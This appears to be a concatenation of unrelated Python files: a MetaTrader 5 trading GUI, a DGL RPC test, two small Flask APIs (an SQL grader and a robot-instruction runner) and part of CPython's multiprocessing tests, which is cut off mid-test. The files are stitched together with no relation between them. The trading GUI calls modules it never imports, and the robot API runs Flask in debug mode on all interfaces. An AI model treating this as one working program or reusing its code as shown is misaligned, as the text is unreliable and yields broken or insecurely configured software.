import toml
import wx.stc
import ui
import impl_config
import order
import status
from enums import *
class FrameMainImpl(ui.FrameMain):
def __init__(self, *args, **kwds):
super().__init__(*args, **kwds)
self.VERSION = '1.4.2'
self.q_ctrl = None # Queue: Interprocess communication for control.
self.q_tick = None # Queue: Interprocess communication for ticks.
self.account_currency = None # str
self.account_currency_digits = None # int
self.account_number = None # int
self.symbols = None # list of str: All available symbol names.
self.symbol = None # str: A symbol that you are trading.
self.symbol_info = None # SymbolInfo: Information of a symbol that you are trading.
self.can_close_by = None # bool: True: Can close a position by another one.
self.bid = None # float
self.ask = None # float
self.spread = None # int
self.selected = False # bool: If True, it prevents invoking on_symbol_input().
# MetaTrader5
self.SetStatusText(f'Scadama {self.VERSION}, MetaTrader5 package {mt5.__version__}')
# Load configuration.
if not os.path.exists('config.toml'):
init_config_toml()
config = toml.load('config.toml')
# Setup queues.
self.q_ctrl = Queue() # Interprocess Communication for controlling a process.
self.q_tick = Queue() # Interprocess Communication for ticks.
# Main Window Size
size = config['size']
if size['x'] != 0:
self.SetSize(wx.Size(size['x'], size['y']))
# choice_client
client = config['client']
self.choice_client.Set(client)
self.choice_client.SetSelection(0)
# Initialize a symbol.
quick_symbols = config['symbol']
self.symbol = quick_symbols[0]
self.symbols = []
def on_config(self, event):
impl_config.FrameConfigImpl(wx.GetTopLevelParent(self), wx.ID_ANY)
def on_connection(self, event):
if self.togglebutton_connect.GetValue(): # Pressed
connect(self)
else: # Pulled
disconnect(self)
def on_symbol_selection(self, event):
symbol = self.combobox_symbol.GetStringSelection()
change_symbol(self, symbol)
self.selected = True
def on_symbol_input(self, event):
if self.selected:
self.selected = False
return
symbol = self.combobox_symbol.GetValue()
if symbol in self.symbols:
change_symbol(self, symbol)
self.combobox_symbol.SetStringSelection(self.symbol)
def on_bid_order(self, event):
lot = self.spinctrldouble_lot.GetValue()
slip = self.spinctrl_slippage.GetValue()
sl = self.spinctrl_sl.GetValue()
tp = self.spinctrl_tp.GetValue()
result = order.send_order('sell', self.symbol, event.price, lot, slip, sl, tp)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
# A new position cannot be fetched right away after sending an order.
#status.update_average(self)
def on_ask_order(self, event):
lot = self.spinctrldouble_lot.GetValue()
slip = self.spinctrl_slippage.GetValue()
sl = self.spinctrl_sl.GetValue()
tp = self.spinctrl_tp.GetValue()
result = order.send_order('buy', self.symbol, event.price, lot, slip, sl, tp)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
# A new position cannot be fetched right away after sending an order.
#status.update_average(self)
# Save the values of the spin controls.
# This is also a workaround: the value you see in a wx spin control
# (int only? float too?) is not necessarily the value you get.
# Only after you click somewhere other than the spin you changed does
# the value you see become the value you get.
def on_setting_spin(self, event):
symbol = self.symbol
sp_lim = self.spinctrl_spread.GetValue()
lot = self.spinctrldouble_lot.GetValue()
slip = self.spinctrl_slippage.GetValue()
sl = self.spinctrl_sl.GetValue()
tp = self.spinctrl_tp.GetValue()
if os.path.exists('spin.toml'):
spin_toml = toml.load('spin.toml')
else:
spin_toml = {}
spin_toml[symbol] = {'sp_lim': sp_lim, 'lot': lot, 'slip': slip, 'sl': sl, 'tp': tp}
with open('spin.toml', 'w') as f:
toml.dump(spin_toml, f)
status.update_commission(self)
status.update_swap(self)
status.update_margin(self)
def on_closing_bid(self, event):
if self.can_close_by:
order.close_bid_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close_bid(self.symbol)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing_all(self, event):
if self.can_close_by:
order.close_all_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close_all()
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing(self, event):
if self.can_close_by:
order.close_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close(self.symbol)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing_ask(self, event):
if self.can_close_by:
order.close_ask_with_closing_by()
self.SetStatusText('Not implemented.')
else:
result = order.close_ask(self.symbol)
if type(result) is mt5.OrderSendResult:
self.SetStatusText(f'{result.retcode}: {result.comment}')
else:
self.SetStatusText(result)
def on_closing_by(self, event):
order.close_by(self.symbol)
def on_close(self, event):
self.q_ctrl.put('disconnect') # Child Process Disconnection
mt5.shutdown()
self.Destroy()
def connect(it):
client = it.choice_client.GetStringSelection()
if mt5.initialize(client): # Success
it.choice_client.Disable()
it.togglebutton_connect.SetLabel('Disconnect')
print('Connected to', client)
it.SetStatusText('Connected to ' + client)
print('MetaTrader 5 version:', mt5.version())
terminal_info = mt5.terminal_info()
if not terminal_info.trade_allowed:
it.SetStatusText('Trading is not allowed. (Tools -> Options -> Expert Advisors).')
account_info = mt5.account_info()
if ENUM_ACCOUNT_TRADE_MODE(account_info.trade_mode) \
== ENUM_ACCOUNT_TRADE_MODE.ACCOUNT_TRADE_MODE_DEMO:
it.SetTitle('Scadama [DEMO]')
elif ENUM_ACCOUNT_TRADE_MODE(account_info.trade_mode) \
== ENUM_ACCOUNT_TRADE_MODE.ACCOUNT_TRADE_MODE_CONTEST:
it.SetTitle('Scadama [CONTEST]')
else:
it.SetTitle('Scadama')
it.account_number = account_info.login
it.account_currency = account_info.currency
it.account_currency_digits = account_info.currency_digits
# combobox_symbol and initializing symbol
symbols_info = mt5.symbols_get()
symbols = []
for x in symbols_info:
symbols.append(x.name)
it.symbols = symbols
it.combobox_symbol.Set(it.symbols)
if it.symbol in it.symbols:
it.combobox_symbol.SetStringSelection(it.symbol)
else:
it.combobox_symbol.SetSelection(0)
it.symbol = it.combobox_symbol.GetStringSelection()
it.symbol_info = mt5.symbol_info(it.symbol)
if not it.symbol_info.select:
mt5.symbol_select(it.symbol, True)
it.spinctrldouble_lot.SetMax(it.symbol_info.volume_max)
set_spin(it, it.symbol)
set_slippage_availability(it)
set_close_by_availability(it)
# A thread to receive a tick.
thread = Thread(target = recv_tick, args = (it, ))
thread.start()
# A process to send a tick.
process = Process(target = send_tick, args = (it.q_ctrl, it.q_tick))
process.start()
it.q_ctrl.put(it.choice_client.GetStringSelection())
it.q_ctrl.put(it.symbol)
else: # Failure
it.togglebutton_connect.SetValue(False)
print('Failed to connect to', client)
print(mt5.last_error())
def disconnect(it):
client = it.choice_client.GetStringSelection()
it.q_ctrl.put('disconnect') # Child Process Disconnection
mt5.shutdown()
print('Disconnected from', client)
it.SetStatusText('Disconnected from ' + client)
it.choice_client.Enable()
it.combobox_symbol.Clear()
it.togglebutton_connect.SetLabel('Connect')
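# Tick pipeline: send_tick() runs in a child process, polls MetaTrader 5 for
# the current symbol's tick and puts it on q_tick; recv_tick() runs in a
# thread of the GUI process, pulls ticks from q_tick and updates the widgets.
# q_ctrl carries the client path, symbol changes and the 'disconnect' command
# to the child process.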
def recv_tick(it): # Runs in a thread.
locale.setlocale(locale.LC_TIME, 'en_US.UTF-8')
while True:
# Get a tick.
tick = it.q_tick.get() # e.g. {'time': 1616153185, 'bid': 1.19124, 'ask': 1.19127,
# 'last': 0.0, 'volume': 0, 'time_msc': 1616153185151, 'flags': 4,
# 'volume_real': 0.0, 'symbol': 'EURUSD', 'error': ''}
# Show the server's local time.
time = tick['time']
# The timestamp is not UTC; it is the server's local time (shown with a zero offset).
time_zone = datetime.timezone(datetime.timedelta(hours = 0))
time = datetime.datetime.fromtimestamp(time, time_zone)
time_str = f'{time:%Y.%m.%d %a %H:%M:%S}' # f-string
it.statictext_time.SetLabel(time_str)
# Show bid, ask and spread.
it.bid = tick['bid']
it.orderbutton_bid.update_price(it.bid, it.symbol_info.digits)
it.ask = tick['ask']
it.orderbutton_ask.update_price(it.ask, it.symbol_info.digits)
it.spread = round((it.ask - it.bid) * (10.0 ** it.symbol_info.digits))
it.statictext_spread.SetLabel(f'{it.spread}')
if tick['error'] != '':
it.SetStatusText(f'Error: {tick["error"]}')
# Show averages.
status.update_average(it)
def send_tick(q_ctrl, q_tick): # Runs in a child process.
client = q_ctrl.get()
if mt5.initialize(client): # Success
symbol = q_ctrl.get()
last_tick = None
while True:
if not q_ctrl.empty():
ctrl = q_ctrl.get()
if ctrl == 'disconnect':
mt5.shutdown()
return
else:
symbol = ctrl
tick = mt5.symbol_info_tick(symbol) # Non-blocking
if tick is not None:
if tick != last_tick:
last_tick = tick
tick_d = tick._asdict()
tick_d['symbol'] = symbol
tick_d['error'] = ''
q_tick.put(tick_d)
else:
# Double parentheses: the Tick structseq constructor takes a single sequence.
# time bid ask last volume time_msc flags volume_real
tick = mt5.Tick(( 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0))
if tick != last_tick:
last_tick = tick
tick_d = tick._asdict()
tick_d['symbol'] = symbol
tick_d['error'] = 'Getting a symbol info tick failed.'
q_tick.put(tick_d)
sleep(0.001)
def init_config_toml():
with open('config.toml', mode='w') as f:
f.write('''\
# Paths to your MetaTrader 5 clients.
client = [
'C:\\local\\mt5\\mq\\terminal64.exe',
'C:\\local\\mt5\\tt\\terminal64.exe',
'C:\\your\\mt5\\terminal64.exe',
]
# Symbols for quick buttons.
symbol = [
'EURUSD',
'USDJPY',
]
# Main Window Size
# If the x value is 0, the window size will be decided automatically.
# [Windows] If your display scale setting is 200%,
# the window will be twice as large as these settings.
[size]
x = 0
y = 0
''')
def set_slippage_availability(it):
if ENUM_SYMBOL_TRADE_EXECUTION(it.symbol_info.trade_exemode) \
== ENUM_SYMBOL_TRADE_EXECUTION.SYMBOL_TRADE_EXECUTION_REQUEST \
or ENUM_SYMBOL_TRADE_EXECUTION(it.symbol_info.trade_exemode) \
== ENUM_SYMBOL_TRADE_EXECUTION.SYMBOL_TRADE_EXECUTION_INSTANT:
it.spinctrl_slippage.Enable()
else:
it.spinctrl_slippage.Disable()
def set_close_by_availability(it):
if SYMBOL_ORDER_MODE(it.symbol_info.order_mode) & SYMBOL_ORDER_MODE.SYMBOL_ORDER_CLOSEBY \
!= SYMBOL_ORDER_MODE(0):
it.can_close_by = True
it.button_close_by.Enable()
else:
it.can_close_by = False
it.button_close_by.Disable()
def change_symbol(it, symbol):
it.symbol = symbol
symbol_info = it.symbol_info = mt5.symbol_info(symbol)
if not symbol_info.select:
mt5.symbol_select(symbol, True)
it.spinctrldouble_lot.SetMax(symbol_info.volume_max)
set_spin(it, symbol)
set_slippage_availability(it)
set_close_by_availability(it)
it.q_ctrl.put(it.symbol)
def set_spin(it, symbol): # Set values of spins.
if os.path.exists('spin.toml'):
spin_toml = toml.load('spin.toml')
else:
spin_toml = {}
if symbol in spin_toml:
spin_data = spin_toml[symbol]
it.spinctrl_spread.SetValue(spin_data['sp_lim'])
it.spinctrldouble_lot.SetValue(spin_data['lot'])
it.spinctrl_slippage.SetValue(spin_data['slip'])
it.spinctrl_sl.SetValue(spin_data['sl'])
it.spinctrl_tp.SetValue(spin_data['tp'])
else:
it.spinctrl_spread.SetValue(0)
it.spinctrldouble_lot.SetValue(0.0)
it.spinctrl_slippage.SetValue(0)
it.spinctrl_sl.SetValue(0)
it.spinctrl_tp.SetValue(0)
status.update_commission(it)
status.update_swap(it)
status.update_margin(it)
|
test_rpc.py
|
import os
import time
import socket
import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal
if os.name != 'nt':
import fcntl
import struct
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((10, 10), F.int64, F.cpu())
def get_local_usable_addr():
"""Get local usable IP and port
Returns
-------
str
IP address and port separated by a space, e.g., '192.168.8.12 50051'
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
sock.connect(('10.255.255.255', 1))
ip_addr = sock.getsockname()[0]
except ValueError:
ip_addr = '127.0.0.1'
finally:
sock.close()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return ip_addr + ' ' + str(port)
def foo(x, y):
assert x == 123
assert y == "abc"
class MyRequest(dgl.distributed.Request):
def __init__(self):
self.x = 123
self.y = "abc"
self.z = F.randn((3, 4))
self.foo = foo
def __getstate__(self):
return self.x, self.y, self.z, self.foo
def __setstate__(self, state):
self.x, self.y, self.z, self.foo = state
def process_request(self, server_state):
pass
class MyResponse(dgl.distributed.Response):
def __init__(self):
self.x = 432
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
def simple_func(tensor):
return tensor
class HelloResponse(dgl.distributed.Response):
def __init__(self, hello_str, integer, tensor):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
def __getstate__(self):
return self.hello_str, self.integer, self.tensor
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor = state
class HelloRequest(dgl.distributed.Request):
def __init__(self, hello_str, integer, tensor, func):
self.hello_str = hello_str
self.integer = integer
self.tensor = tensor
self.func = func
def __getstate__(self):
return self.hello_str, self.integer, self.tensor, self.func
def __setstate__(self, state):
self.hello_str, self.integer, self.tensor, self.func = state
def process_request(self, server_state):
assert self.hello_str == STR
assert self.integer == INTEGER
new_tensor = self.func(self.tensor)
res = HelloResponse(self.hello_str, self.integer, new_tensor)
return res
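# RPC pattern used by the tests below: both sides register the service id via
# dgl.distributed.register_service(), the client sends a HelloRequest, and the
# server's process_request() returns a HelloResponse that is routed back to
# the caller.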
def start_server(num_clients, ip_config):
print("Sleep 5 seconds to test client re-connect.")
time.sleep(5)
server_state = dgl.distributed.ServerState(None, local_g=None, partition_book=None)
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.start_server(server_id=0,
ip_config=ip_config,
num_servers=1,
num_clients=num_clients,
server_state=server_state)
def start_client(ip_config):
dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest, HelloResponse)
dgl.distributed.connect_to_server(ip_config=ip_config, num_servers=1)
req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
# test send and recv
dgl.distributed.send_request(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test send_request_to_machine
dgl.distributed.send_request_to_machine(0, req)
res = dgl.distributed.recv_response()
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
# test remote_call_to_machine
target_and_requests = []
for i in range(10):
target_and_requests.append((0, req))
res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
for res in res_list:
assert res.hello_str == STR
assert res.integer == INTEGER
assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
def test_serialize():
os.environ['DGL_DIST_MODE'] = 'distributed'
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
SERVICE_ID = 12345
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
req1 = deserialize_from_payload(MyRequest, data, tensors)
req1.foo(req1.x, req1.y)
assert req.x == req1.x
assert req.y == req1.y
assert F.array_equal(req.z, req1.z)
res = MyResponse()
data, tensors = serialize_to_payload(res)
res1 = deserialize_from_payload(MyResponse, data, tensors)
assert res.x == res1.x
def test_rpc_msg():
os.environ['DGL_DIST_MODE'] = 'distributed'
from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
SERVICE_ID = 32452
dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
req = MyRequest()
data, tensors = serialize_to_payload(req)
rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
assert rpcmsg.service_id == SERVICE_ID
assert rpcmsg.msg_seq == 23
assert rpcmsg.client_id == 0
assert rpcmsg.server_id == 1
assert len(rpcmsg.data) == len(data)
assert len(rpcmsg.tensors) == 1
assert F.array_equal(rpcmsg.tensors[0], req.z)
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
os.environ['DGL_DIST_MODE'] = 'distributed'
ip_config = open("rpc_ip_config.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt"))
pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",))
pserver.start()
time.sleep(1)
pclient.start()
pserver.join()
pclient.join()
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_multi_client():
os.environ['DGL_DIST_MODE'] = 'distributed'
ip_config = open("rpc_ip_config_mul_client.txt", "w")
ip_addr = get_local_usable_addr()
ip_config.write('%s\n' % ip_addr)
ip_config.close()
ctx = mp.get_context('spawn')
pserver = ctx.Process(target=start_server, args=(10, "rpc_ip_config_mul_client.txt"))
pclient_list = []
for i in range(10):
pclient = ctx.Process(target=start_client, args=("rpc_ip_config_mul_client.txt",))
pclient_list.append(pclient)
pserver.start()
for i in range(10):
pclient_list[i].start()
for i in range(10):
pclient_list[i].join()
pserver.join()
if __name__ == '__main__':
test_serialize()
test_rpc_msg()
test_rpc()
test_multi_client()
|
main.py
|
from flask import Flask, request
import threading
from .grading import gradingProcess
from .queryComparison import dataGen
app = Flask(__name__)
@app.route("/")
def index():
return "SQLGrader API"
# route for running the grading process by grading_process_id
@app.route("/grading/<int:grading_process_id>", methods=["POST"])
def grading(grading_process_id):
data = request.get_json()
apikey = request.headers.get("apikey")
# Run the grading process in a background thread so the request can return immediately.
grading_thread = threading.Thread(target=gradingProcess.rungradingprocess, kwargs={"grading_process_id": grading_process_id, "apikey": apikey, "post_body": data})
grading_thread.start()
return "Grading process started", 200
# route for query data generation
@app.route("/datagen/<int:environment_instance_id>", methods=["POST"])
def datagen(environment_instance_id):
data = request.get_json()
apikey = request.headers.get("apikey")
# Run data generation in a background thread so the request can return immediately.
datagen_thread = threading.Thread(target=dataGen.startdatagen, kwargs={"environment_instance_id": environment_instance_id, "apikey": apikey, "post_body": data})
datagen_thread.start()
return "Data gen started", 200
|
api.py
|
#!/usr/bin/env python3
from threading import Thread
from flask import Flask, request
from flask_restplus import Resource, Api, fields
from parser import parse_instructions
from io import open
from os.path import isfile
app = Flask(__name__)
api = Api(app)
program = api.model('program', {
'instructions': fields.List(fields.String, required=True, description='Instructions', example=["mov 50 200", "rot 100 90"])
})
@api.route('/echo')
class Echo(Resource):
def get(self):
return {'response': 'echo'}
@api.route('/runprogram')
class RunProgram(Resource):
@api.doc("Run a program given an instruction set")
@api.expect(program)
@api.response(400, 'Malformed request')
@api.response(409, 'Another program is already running')
@api.response(200, 'Program transfer complete')
def post(self):
if isfile('lock'):
return {'response': 'error', 'message': 'Another program is already running'}, 409
print(request.json)
if not request.json or "instructions" not in request.json:
return {'response': 'error', 'message': 'No instructions provided'}, 400
open('lock', 'w').close()
instructions = request.json["instructions"]
Thread(target = parse_instructions, args = (instructions, 1, )).start()
return {'response': 'success'}, 200
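# Example request (sketch; localhost:5000 matches the app.run() call at the
# bottom of this file, and the instruction strings come from the model
# example above):
#   curl -X POST http://localhost:5000/runprogram \
#        -H "Content-Type: application/json" \
#        -d '{"instructions": ["mov 50 200", "rot 100 90"]}'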
@api.route('/terminate')
class Terminate(Resource):
@api.doc("Terminate the currently running program")
@api.response(400, "No program is currently running or termination is in progress")
@api.response(200, "Program termination request success")
def get(self):
if isfile('terminate'):
return {'response': 'error', 'message': 'Termination in progress'}, 400
if not isfile('lock'):
return {'response': 'error', 'message': 'No program is currently running'}, 400
open('terminate', 'w').close()
return {'response': 'success'}, 200
@api.route('/busy')
class Busy(Resource):
@api.doc("Check if a program is currently running")
@api.response(200, 'Status information')
def get(self):
return {'response': 'success', 'status': isfile('lock')}, 200
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API as threading.Thread
# (join() and is_alive()), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # setting this to True makes the tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
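# Usage sketch: wrap a blocking call, then assert on how long it blocked,
# mirroring how the queue and semaphore tests below use it:
#   get = TimingWrapper(queue.get)
#   self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
#   self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)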
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
